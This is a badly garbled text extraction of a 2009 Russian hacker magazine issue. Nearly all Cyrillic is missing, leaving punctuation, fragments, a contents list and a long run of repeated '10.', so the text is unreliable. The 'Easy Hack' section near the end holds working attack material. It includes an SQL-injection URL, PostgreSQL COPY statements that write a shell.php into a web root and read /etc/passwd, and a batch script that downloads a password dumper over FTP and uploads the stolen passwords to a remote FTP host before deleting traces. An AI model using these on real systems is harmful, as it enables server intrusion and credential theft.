Хакер 2009 01(121).pdf

01 (121) 2009

WINDOWS . 128

w w w.xakep.ru

01 (121) 2009

WINDOWS

w w w.xakep.ru

. 96

PHP-. 62

WEB-. 26

- GPS-. 36

. 20

x 01(

)2009

121W

ind

oW

s 7/

01 (121) 2009

2009 W

ind

oW

s 7/ 2009

Win

do

Ws 7/

2009

-

, . -, : - 10 , --. , , , , , . :).

P.S. X-party . .

nikitozz, . . Xudalite.livejournal.com

10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.

092 -

CURL BUILDER C++

096 , ,

-

102

\++

104

108

Syn/AcK112

WAIK: WINDOWS

118

WIN2K8 WSUS 3.0 SP1

122

128 lIvecd:

LINUX

132 pSychO:

136 fAq unIted

FAQ

139

8,5

140

142 x-puZZle

144 www2

WEB-

004 MeGAnewS

ferruM016

-

pc_ZOne020 wIndOwS, 7:

-

026 rIA-

-

032 Sdl, MIcrOSOft

SECURITY DEVELOPMENT LIFECYCLE

036

GPS-

040 eASy hAcK

044

048 qIp

-

052

056

3D-

062

PHP-

066

070 -tOOlS

072

078 x-Stuff

082

086

UBUNTU 8.10 KUBUNTU 8.10:

091 tIpS'n'trIcKS

Content01(121)

WEB-

/> nikitozz ([email protected]) > gorl([email protected])

> Forb ([email protected]) PC_ZONE UNITS step ([email protected])UNIXOID, XAKEP.PRO PSYCHO Andrushock ([email protected]) Dr. Klouniz ([email protected]) Dlinyj([email protected])> ([email protected])

/dvd> Step ([email protected])> unix- Ant > ([email protected])>

/Art>- ([email protected])> ([email protected])>

/xakep.ru> ([email protected])

/> ([email protected] )> ([email protected]) ([email protected]) ([email protected])> ([email protected])> ([email protected])

/publishing> ([email protected])> > ([email protected])> ([email protected])> ([email protected])> ([email protected])> ([email protected])> ([email protected])>pr- ([email protected])

/ > ([email protected])> ([email protected] )

> ([email protected]).: (495) 935.70.34: (495) 780.88.24> .: 8 (800) 200.3.999

> 101000, , , / 652, , 77-11802 14 2002 . ScanWeb, . 100 000 . .

. : . , , . .

. .

092 -

CURL BUILDER C++

096 , ,

-

102

\++

104

108

Syn/AcK112

WAIK: WINDOWS

118

WIN2K8 WSUS 3.0 SP1

122

128 lIvecd:

LINUX

132 pSychO:

136 fAq unIted

FAQ

139

8,5

140

142 x-puZZle

144 www2

WEB-

092

032

128

048Content01(121)

x 01 /121/ 09

>> meganews>> meganews

Meganews

Mifrill

/ [email protected] /

, , . , . - CD- DVD-. , . , , - . . , , 100 , . , -, , , , .

>> meganews

004

Nokia , , , . Nseries . N97 3.5" QWERTY- . - WiFi, Bluetooth, GPS, 5- Carl Zeiss, 32 16 (-

microSD-). -, Flash-, , . Nokia A-GPS N97 , , ( ). 2009 , 550 .

ASUS Eee PC 60% .

006

IE .

1.91% .

>> meganews>> meganews

100.000 Creative Commons.

, - . 2009 1- . , , . , , - . , , . , , . - , - . , :).

Windows, , - . , , . , Microsoft Windows XP Microsoft Office XP. , , , , , , . , : 117 . , . , , , , - .

- , , - . . TN Games, - , , - HTX Helmet, . , - FPS. 2009 , . , TN Games, , , , - $200, .

x 01 /121/ 09

>> meganews

008

>> meganews

9 AOL ICQ- 5.1.

. , , - , - . -, , - . ;-)

- . , , :-), ;), :) . . -, , Nestle , , . (, ) . -, ; -, - , , , , . , - , . , -, .

, , -. - . , , , , Lingvo X3 ME, ABBYY . ME Medved Edition, . - , IT-, - . - - , 490 . , -, ABBYY , - - - .

, - . , , , Windows. , - 250.000 . , , - , . , , , , Microsoft . . , , . , , -. , , , , .

.

2009 .

x 01 /121/ 09

x 01 /121/ 09

>> meganews>> meganews

? , , , . . Facebook , . Facebook (Adam Guerbuez) . , , . , $873 . - Facebook 2008 $300 . , Facebook 4 . -, , , . , , . Facebook , - , .

Windows 90% : 89.62%.

>> meganews

, . ( ), . , . www.biletam.net . , ( ), . , ! , . , 27 . , - . , , , , , , .

-

010

Palm, , , - . , , ; , - . . -

, Palm - Apple , ,

Palm Nova. , Palm Palm OS 5. Nova , 2009 . BlackBerry iPhone, 2% . , , App Store. -, . , !

x 01 /121/ 09

>> meganews

012

>> meganews

512 SDD , 10 , . Toshiba SSD- 64, 128, 256 512 . , 512 , 1.8". 2.5". MLC--, Toshiba 240 \ 200 \ . , AES-. -, , 2009.

, , , . 1250 ( ) 1- 2008, , . : . , , , , . -, , , . , . , , YouTube -, - , , , .

, Yahoo! , Microsoft. , . Microsoft $47.5 ., Yahoo! . 2008 Microsoft , . , Yahoo! ( - , 2008 ), - Yahoo! . , , , . , $20 . , Microsoft AOL Fox Interactive Media , , , . Microsoft .

1234567. 123456.?

x 01 /121/ 09

>> meganews

013

-, EBay. , , . - , - , , - . , , 0000. , . , , . - EBay , , , , .

512 SDD

Microsoft , , . . - Windows 7 , , . Device Stage, Jump Lists. Windows Advanced Rasterization Platform (WARP), DirectX 10 10.1 . Windows Live, . Windows 7 , Vista, 2010-. -, -, 2009. , . , Vista - Service Pack 2. , Vista SP1. SP2 2009 . - , , , .

x 01 /121/ 09

>> meganews

014

!

Google, Google Chrome, . - , , . Gmail -- ( , ) : Gmail . Chrome , -, Opera. , , Opera -, Chrome 0.71% 0.83%. , ,

Firefox 3 Chrome. , , Gmail. IE -, , . , 7- , 7- (, Google ). , , : Internet Explorer, IE8, - : Firefox 3 Chrome. Chrome Google Earth. - !

>> meganews

-

,

, -

. 2008 $82 .

- .

, -

10.000. - , ,

- (, ) ,

- . -

, ,

. .

, - - , . , Telstra, , . , . -, , . . - , .

>> meganews

015

- . , , -, , . , -, , . , , ? , ,

Grippity. , QWERTY- - . , () . , , -. , Grippity - , , , . . $100, .

x 12 /120/ 08

. , , Abit - . Abit , 2004 . - - . , - , Universal Scientific Industrial (USI). USI Abit , , . Abit - , , , . , . 1- 2009 Abit - .

>> ferrum

, , - . , , - - -. Skype , ICQ, Mail- yahoo-messenger. , , . 128 /. , . -, 640480 . , , . , , . , smotri.com - , . , web-. , .

. . . , , , . Skype , , -.

Skype. - , 10 /. ! , . Windows XP Professional SP3 - . . , . ( - -). , , .

016 x 01 /121/ 09

-

! ,

- .

. -

.

>> ferrum

017

Creative, , . . , - , . : , , . - - . . . . . . : , USB . ( ). . - , .

: : 1,3 :1280 x 1024 : 5 ( ) : 30 / : USB 2.0

Creative Live! Cam Notebook Ultra

x 01 /121/ 09

Genius iSlim 321R : : 0,3 : 640 x 480 : 0,3 ( ) : 30 / : USB 2.0

Genius , - . - . - . ( ). , . - , , , . , . , - . , , . . , , . : , .

2300 .

750 .

BE

ST

BU

Y

B ES T B U Y B

E ST

BU

Y

EDIT

OR

s C

H OI C E E D I T O R s

CH

OIC

E

. - , , , - . . - - 2 . , USB. . , , , - , . , -. . - . , . , : , . , , , -. , , . : , , .

>> ferrum

x 01 /121/ 09 018

1400 .

. , - , , , -. ( -) , , . - , , . . . , - ( ). . -, , , , . . .

: : 1,3 : 800 x 600 : 1,3 ( ) : 30 / : USB 2.0

Hercules Deluxe Optical Glass

2200 .

: : 1,3 : 1280 x 1024 : 5 ( ) : 30 / : USB 2.0

Hercules Dualpix Chat and Show

, 100% . , - web-, . . Logitech QuickCam Sphere AF. ,

. , ( ), Creative Live! Cam Notebook Ultra -. Microsoft LifeCam VX-5500 , . ! z

: : 0,3 : 640 x 480 : 1,3 ( ) : 30 / : USB 2.0

Microsoft LifeCam VX-

Microsoft . : , (Russian edition?). -. , . , : . , 0,3 . , : . : , . , . . : -, , , . : , ( 640480).

x 01 /121/ 09 019

>> ferrum

Logitech. , . -, Carl Zeiss . -, . -, , . -, . , 26-- . - . , , , , . . - , .

: : 2 : 1600 x 1200 : 8 ( ) : 30 / : USB 2.0

Logitech QuickCam Sphere AF

BE

ST

BU

Y

B ES T B U Y B

E ST

BU

Y

EDIT

OR

s C

H OI C E E D I T O R s

CH

OIC

E

4600 .

2300 .

Vista, Microsoft

Windows 7. !

2010 , preBeta- !

: blAcKcOMb , Windows 7 - Microsoft. , Windows XP Vista . Windows 7 . ,

, , . Windows 7 Microsoft! 2000 . , , Microsoft BlackComb 2005 , 2001

WindoWs, 7:

sPider_Net

/ [email protected] /

>> pc_zone

020 x 01 /121/ 09

-

, BlackComb Windows LongHorn, Vista. Blackcomb Vienna. , , Windows 7 , ! , Microsoft . , , . ; , Vista. -, . PreBeta-- build 6801. Microsoft PDC, -. 6933, - 6801, .

, , -. . 6956, , . , , .

UAC, , , - . . Microsoft, , , - . , (, slow_work=on?), : Windows 7 ! !

Windows 7

WordPad

x 01 /121/ 09 021

>> pc_zone

. Pentium 4 ( Vista 40-45 ). . Aero , , . , . - (Visual Studio 2008, Delphi 2009 ..), , . : , ?. , , Vista. , 30 . : -

Windows 7? ! , PreBeta, . : Vista . , 2-3 . , . - , Asus eeeP .

-. , -. Windows 7 - SuperBar . , , -. .

Vista . - , - -. , . , , - .

- - ( Libraries), - . - . -, -. - , - .

-, . - .

info

(Super Bar)

TC TC

ISE UAC

Windows Media Player

x 01 /121/ 09 022

>> pc_zone

. : ? . , , Windows. . . Vista, , . , - , . , , , ( ). : - .Windows , . -: Word . , Microsoft - SideBar, . , , - .

, Microsoft : MS Paint, , WordPad .. Windows 95. 2010 Microsoft . , MS Paint ribbon; - - PNG.WordPad , , MS Paint, . , -, , . , Windows Media Player. , , - , :).

--, Microsoft - , *nix-. -, ,

- Windows 7 , Windows 7, - . : , , , , . ? Windows 7 , . (- , , 50% ; ) - AeroSnap (www.aerosnap.de.vu). , Winsplit Revolution (www.winsplit-revolution.com). UAC, , Vista . , , Nortons User Account Control (www.nortonlabs.com/inthelab/uac.php). , , , - , . Life Rocks blog , , , wallpaper, . : www.nirmaltv.com/2008/11/07/transform-vista-to-windows-7. Aero Peek, , . , Visual Task Tips (www.visualtasktips.com), Taskix (taskix.robustit.com).

x 01 /121/ 09 023

>> pc_zone

. bat , CScript . 2006 MS PowerShell , .NET Framework. MS. Windows 7 - - .

Windows -. , Windows Solution Center. -, , . UAC, , - , . , .Vista User Account Control, - . ( API-, , ), - . Windows 7, , UAC . , UAC , . , UAC , .

OutrO by Step , -, - , , , ... . Vista . , Daemon Tools, . . , , . , :)P.S. 14- . . z

>>

6801 , Vista. , -. . , , - . , : 1. ( ) - Rafael. 2. Windows.3. :

> takeown /f %windir%\explorer.exe

> cacls %windir%\explorer.exe /E /G :F

> start unlockProtectedFeatures.exe

4. .

024 x 01 /121/ 09

026 x 01 /121/ 09

- rIA () - , : , . , ( , ). , - ( ). , , . ActiveX Microsoft Java-, , , , . Flash , , , API, . : - - - , , , .

, , . , - (, , , ) Google Chrome , . , , . , Mozilla Prism, Mozilla Firefox (, ). , Safari . - -, , . Flash-. Adobe AIR, - Adobe (z, #111).

-

-

. - ,

. AJAX!

-

?

RIA-

/ [email protected] /

>> pc_zone

027 x 01 /121/ 09

? , RIA-. RIA Rich Internet Application , , ( -) . , , , , , HTML. RIA , -

. , - , , , , , , . , -, - ! :

BrowserPlus Yahoo -,

>> pc_zone

RIA-!

dvd

- Silverlight 2 - : http://silverlight.net/GetStarted/overview.aspx.

: www.silverlighter.ru, www. silverlight.ru.

Unix- : www.go-mono.com/moonlight.

-! - MS Expression Studio 2 - Microsoft: expression.microsoft.com.

links

Doom !

028 x 01 /121/ 09

RIA- ! , ?

GOOGle GeArS GOOGle: gears.google.com : Firefox, Internet Explorer Safari, Android Windows Mobile: Google Docs docs.google.com Google Reader reader.google.com

RememberTheMilk www.rememberthemilk.com Zoho Writer zoho.com - Wordpress Google ChromeGears , AJAX-. - . , Google Gears -

Titanium (www.titaniumapp.com) - , -- HTML/CSS/JavaScript - , , -- -. .

info

Flex

Silverlight Microsoft

Google Gears Yahoo BrowserPlus - , Flash, Silverlight JavaFX .

RIA - , .

warning

>> pc_zone

029 x 01 /121/ 09

, . , Google Docs, WiFi-, - 20. , Gears. , , - Google. , Gears, , , Google Docs, Wordpress. 2.6, - Gears - . - , . MySpace , ( , Gears , , - ). : Google Gears ? . API, - . (-, SQL- , - ), API , --, JavaScript- . , , : - , - . Google Gears - , , . , /

( - kernal32.dll, -), ! URL - . : Google Gears . - , gears.google.com . Google Chrome , . -, Google Gears Adobe Flash, .

yAhOO! brOwSer pluS yAhOO : browserplus.yahoo.com : Firefox, IE 6/7,Safari, Chrome, Mac PC: Yahoo!, Flickr

Yahoo! Browser Plus , - - ( JavaScript). Google Gears, , : !. Gears, BrowserPlus . : - , drag-n-drop, -, . - ImageMagic , Photoshop Express Adobe MS Paint. , Ruby, , ( Gears, , , ) Text-to-Speech (, , ). : , , . , , : , - .

MIcrOSOft SIlverlIGht/MOOnlIGht - : microsoft.com/silverlight/ : Firefox, IE 6/7, Safari, Mac, PC

Gears !

Google Gears , - AJAX- - Gears ( - , ). , Gears : - - , . , - Google Gears: Dojo Toolkit jQuery ( jquery-offline, http://code.google.com/p/jquery-offline); ExtJS , , .

>> pc_zone

030 x 01 /121/ 09

Linux/Unix: Microsoft NBA iStreamPlanet - sky.com Flash- , Microsoft, , ( , , ) .NET Framework, -. MS Silverlight, , Mono, Linux/Unix Moonlight, . , , Gears BrowserPLus. Silverlight -, .NET. - ( HD-, DRM-, - - VC-1, WMV, WMA, MP3), ( C#, .NET-), XML , . DHTML JavaScript, , , Silverlight -, , . API XMLHTTPRequest, AJAX-: , (, AJAX- server-push Comet ). , - . Silverlight , - JavaScript API, - , .NET. , Microsoft , -, Silverlight 2, ! , ,

Windows, Mac, Linux.

AdObe flASh/flex : http://www.adobe.com/products : Firefox, IE 6/7, Safari, Mac, PC Linux/Unix: Adobe www.orbismap.com eBay Google Analytics Flex- http://wiki.flash-ripper.com/?title=_Flex-Flash , , . , RIA-- Adobe Flex. Flash, -

Silverlight , ImageCup

>> pc_zone

Quake Native Client (http://code.google.com/p/nativeclient) Google, x86- ! , , ! Linux ! , Quake . , , :1. Native Client (http://code.google.com/p/nativeclient);2. Google Chrome Firefox http://projects.cocaman.net/quake/quake.html.

031 x 01 /121/ 09

, , MXML, , GUI-. , Flash Adobe . 10- -. - , Silverlight, , -, HD, Adobe Pixel Blender! . , , Flash - . , FarCry Crysis , Quake/Doom ! Adobe Alchemy -. - - , , , ++. ++

( , , , ). C++ , , 3D-, , , 3D DirectX OpenGL! , ( , http://alternativaplatform.com/ru), , . Doom ? www.newgrounds.com/portal/view/470460.

? . - - (, ) . JavaScript, , , -. , , !. , - , .NET Microsoft. - Silverlight Adobe Flash/Flex/Alchemy, , (C# .NET Framework Silverlight 2, ++ Alchemy) . , JavaScript , . , IDE ( , , - ?). , RIA- , , , , , , . : -, , ? , , ? :)z

. , - !

>> pc_zone

Sun, - Java JavaFX. RIA-, FxScript. JRE - (, Silverlight Flash), , -, , - . , Java , JavaFX. , , Sun java-... : http://www.javafx.com/about/overview

032 x 01 /121/ 09

SECURITY DEVELOPMENT LIFECYCLE

2003 , 1.500.000 ,

3.370.000 ,

RPCSS.

, -

,

Senior Development Lead Microsoft.

Microsoft BlackHat, , . . Microsoft -

, , - . : 50000 , Microsoft, . ! , , . , , SDL Security Development Lifecycle.

Sdl - . , SDL -

SEC(R)2008, . . SDL . , , - best practices , , . : , , , -. SDL , : , , , , , , . , SDL - , . , ( ). , - , . , , ,

SDL, Microsoft

, 1999 , . , Windows, .

>> pc_zone

>> pc_zone

033 x 01 /121/ 09

, !, , - , SDL : Microsoft . . : , ! -. Microsoft Security Response Center, . , , - , - , - , , RPC, , SDL, . - , ( ) , , -. , , . , -, (), - , , . , SDL .

? : SDL ? ,

, :). - SDL Optimization Model, , , , SDL . , SDL ( ), , , - . C/++ /GS ( ), /SAFESEH (/SafeSEH) SDL. - . Best Pratices /NXCompat, (DEP) (/NXCompat). , PREfast, FxCop, Application Verifier. PREfast Visual Studio ( 2005) - /analyze. , _alloca, :

char *b;

do {

b = (char*)_alloca(9)

} while(1)

- , Visual Studio, FxCop

FxCop managed-

SDL

, , , - Blaster, :

WCHAR wszMachineName[N+1] {

WCHAR wszMachineName[N + 1];

LPSTR pwszServerName = wszMachineName;

while (*pwszPath != L\\)

*pwszServerName++ = *pwszPath++;

}

pwszPath, wszMachineName.

>> pc_zone

034 x 01 /121/ 09

, .NET Framework ( , ). , - .Application Verifier - unmanaged-. , . AppVerif , , . , - API, -. - Visual Studio. IDE , , -, strcpy. :

void func(char *p) {

char d[20];

strcpy(d,p);

// etc

}

*p , . strcpy , ( - ). Visual C++ stdafx.h :

#define _CRT_SECURE_CPP_OVERLOAD_STANDARD_

NAMES 1

, :

void func(char *p) {

char d[20];

strcpy_s(d,__countof(d), p);

// etc

}

, SDL. . , . SDL , - , , .

. , Microsoft SDL, , SDL. , . , - , . , -

Microsoft - SDL (, 3.2, MS 4.0). SDL , -.

info

SDL Threat Modeling Tool

DVD - .

dvd

>> pc_zone

035 x 01 /121/ 09

. SDL Threat Modeling Tool Microsoft, , , Visio. , ? - ! , (), , . . . , . , , , - . , :

1. ? : .

2. ?

3. - ? ! , , .

, . SDL Threat Modeling Tool , -, . , .

MS , , , , . - , . , , - : API . , , , - ( ). . -, . , , - - . , Word doc-, JPEG. JPEG , , , -, , .-, . , Word : doc-, . . -

, , . , , , , Man-in-the-middle . :1. (dumb) . .2. (smart) . , , JPEG - - . , , . , . ? . , NDA. : , Microsoft, Peach ( , http://peachfuzzer.com). , peach pits ( ) , . : , RPC, COM/DCOM, SQL- . : FileFuzz, Fuzzing Software (http://www.fuzzing.org/fuzzing-software); File Fuzzers, Fuzzbox, Windows IPC Fuzzing Tools, Forensic Fuzzing Tools iSEC Partners (www.isecpartners.co).

Sdl? ! - , . : - ! z

SDL , SDL , - , , . SDL, , , . Microsoft Microsoft Source Code Analyzer for SQL Injection XSS Detect Beta. Visual Studio XSS- -. XSS , : RATSRough Auditing Tool for Security (http://www.fortify.com/security-resources/rats.jsp) ProxMon (http://www.fortify.com/security-resources/rats.jsp). :Microsoft Anti-Cross Site Scripting Library V1.5 for .NET applications AntiXSS for Java (http://www.gdssecurity.co) :SiteLock ActiveX - - . Best Practices, ;Banned.h -, , SDL.

Visual Studio 2005, PREfast Visual Studio - /Analyse

GPS-

GPS-. , : -

, - .

. -

, !

GPS- Windows Mobile. - .

, GPS-! , , , , - . - POI, - (, , , , .., ..). , . , ,

, , , . , . - , , . , , GPS- , . , - . , , - , . , - , . , GPS-- , - . ,

-

>> pc_zone

036 x 01 /121/ 09

037 x 01 /121/ 09

, . , GPS , , !

eMbedded- ( , , , ), ? , , , : GPS-, . : . , . , . . user-friendly , . , , , -- ( - ). ! Windows,

, , . , ? .

GPS, Voxtel -, ( ) - Voxtel Carrera X433. - , - GPS-, . , - . ,

?navitel.ru , - . , , .

autosputnik.com 2007, . Tele Atlas, . OnLine POI ( , , , ..) .

iGOi-go.com/ru , . - , , .

TomTomwww.tomtom.com TomTom -, . . - embedded-, , .

Garmin Mobile XTwww.garmin.ru - Nokia, Windows, WinCE. , -.

3.2

iGO 8 3.2

TomTom Navigator

>> pc_zone

- , - , Windows CE (WinCE). - Windows , . , , . , Windows CE 32 , . GWES- 5 . , - ( ), GPS-- . , ., ( - PND PNA ), GPS--, BT-, //. , ( ). ,

, - Windows, : -, .. www.gps-club.ru 4pda.ru, Embedded-, PND-. , SD- shell.ini :

\windows\explorer.exe

card-, ActiveSync Microsoft , , - (, USB

. 512 ( -), fat16 - . , , off on. - . , . , , 10-15. , , , .

info

100% gpspassion.com, gps-club.ru 4pda.ru.

links

- , , , . .Visual Studio. Visual Studio ( Express-) Windows CE/ Windows Mobile -, , - .

Platform Builder. , , , . , - . SDK, - Platform Builder. (SuperH, x86, MIPS, ARM).Embedded Visual C++ (eVC). Visual C++ embedded- Windows CE.

WinCE

Garmin Mobile XT

GPS- -

System Information -

Mio Menu

>> pc_zone

038 x 01 /121/ 09

>> pc_zone

039 x 01 /121/ 09

). explorer.exe ( ). !, -. - , , , . Audio, Music, Video Navitel, . 3.2, -, , . Navitel.exe , - GPS--. ? , - , , , iGo Igo.exe Navitel.exe. ( )! exe- -. navitel.exe explorer.exe. , , . , , , ceDesktop.exe, . Navitel.exe, , :). , , Windows CE 5.0., ( Windows Explorer), , (\DataStorage\CentralAP.exe), - CONF.ini. - . , , iGo GPS, :

GPSPath= \User\Navitel\Navitel.exe

, , iGO8 :). , ( ) , , . , -

TotalComander WinCE. ? !

? , - , Visual Studio ( ). , , , . Voxtel, , - . , - . , - - . !MioPocket 2.0 (http://www.gpspassion.com/forumsen/topic.asp?TOPIC_ID=109690) Mio, . , . , , , , MS Office, - , .. , . : ( ) System Infomation (http://gpstacho.bettersoft.de)., , , - . : , ? , : - , . , Registry Workshop.! z

- , Windows CE, , - , , , , . , :1. PNA;2. , ( , - ..);3. Mobilenavigator, exe- mobilenavigator.exe;4. . Voxtel Carrera , .

GPS-: WindowsCE

>>

040

r0id

/ [email protected] /

Easy Hack}

: Sql- MySql: , SQL- - - . , , - . , LIMIT, , , . , , . GROUP_CONCAT() MySQL => 4.1 . ( concat(), - ). , GROUP_CONCAT() , - . , 1 (aka 1024 ), group_concat_max_len. , - , -. , GROUP_CONCAT():1. .2. , DISTINCT, ORDER BY, ASC/DESC.3. LIMIT.4. 1024 ( ). - GROUP_CONCAT() MySQL => 5 .1. , sql- :

http://www.hacked.com/index.php?id=-1

2. ( , [- -] > [ ] . -, , (00401000) - PUSH 0. 6A 00.

- JMP, PUSH 0

2

>>

x 01 /121/ 09

: - : . www.virustotal.com. , , www.virustotal.com ( , 1wmz ). - :). . :1. ///etc : PHP5 cURL, set_time_limit(); .htaccess; - (/etc);2. ( , ChaaK) ;3. 777 ./files;4. index.php, - :

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#

$updir = 'files'; #

$maxfsize = 2048; #

$sleep = 5; # (-

5)

$abort = 180; #

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#

, , . , , :). , www.virustotal.com , . , , ChaaK .

3

041

, 00401026. : jmp 00401026, ( ) EB 24. , , EB 24 6A 00. - XOR ( , , ). EB24 6A00, XOR X: EB24 XOR X = 6A00. - X : X = 6A00 XOR EB24, X = 8124. , ; - XOR 2481., :1. OllyDBG PUSH 0, 00401000, jmp 00401026, EB24.2. 00401026, , - :

00401026 MOV EAX, 00401000 ; EAX

0040102B MOV EBX, [EAX] ; -

EBX

0040102D XOR EBX,2481 ; XOR

jmp 00401026 PUSH 0

00401033 MOV [EAX],EBX; -

...

00401035 JMP 00401000 ; ...

3. . ! - . , : , - , -, , .

: Sql- pOStGreSql: , MySQL MSSQL, PostgreSQL. . - , . , , , PostgreSQL , , , , -, . :1. - ( -

, ).2. ( load_file() MySQL). - . -

- - PostgreSQL, :1. (, table_file).2. - (, ).3. (-) , - -.

PostgreSQL

4

>>

042

: pe- ApI-, dll: IID King 2.0, PE- .1. wasm.ru DVD IID King.2. , , , Pick a file.3. dll, , Click to pick DLL(s) and their API(s) to add.4. , API-, Add Them!.5. API

Add Them!, Backup ( bak- ). ! , DLL.

5

x 01 /121/ 09

: exe-: , - . - , , ? , , ExeScript, .bat-, .vbs- .js- -. :1. DVD.2. .3. ( vbs/js-).4. .5. exe., , -. :

@echo off

Echo open xxx.xxx.

xxx.xxx>go.txt&&echo

ftpuser>>go.txt&&echo

12345>>go.txt&&echo

get passexport.

exe>>go.txt&&echo

bye>>go.txt

Echo open xxx.xxx.xxx.

xxx>send.txt&&echo

ftpuser>>send.txt&&echo

12345>>send.txt&&echo

send pass.txt>>send.

txt&&echo bye>>send.txt

ftp -s:go.txt > nul

passexport.exe pass.txt

ftp -s:send.txt > nul

del go.txt send.txt passexport.txt pass.txt name.bat

, , ? - , .

6

exe

:

CREATE TABLE table_shell(column_shell TEXT NOT NULL);

INSERT INTO column_shell VALUES('');

COPY table_shell (column_shell) TO '/var/www/html/

shell.php';

4. :

COPY (SELECT '') TO 'FILE_

NAME'

, --, . - 1. ( load_file() MySQL):

CREATE TABLE table_file(column_file TEXT NOT NULL);

COPY table_file (column_file) FROM '/etc/passwd';

SELECT * FROM table_file;

2. n m :

pg_read_file('bla.txt',n,m)

( n m )3. :

pg_ls_dir('/tmp')

4. :

pg_stat_file('users.txt')

, . :).

>>

: :, -- . , , , . , ( , host-based ips .). , Rnmap.1. NMAP (rnmap.sourceforge.net).2. rnmap-adduser.py vasia.3. telnet Grnmap.py . Nessus. - (t1shopper.com/tools/port-scanner). , , . , NMAP, - . z

RNMAP

8

x 01 /121/ 09 043

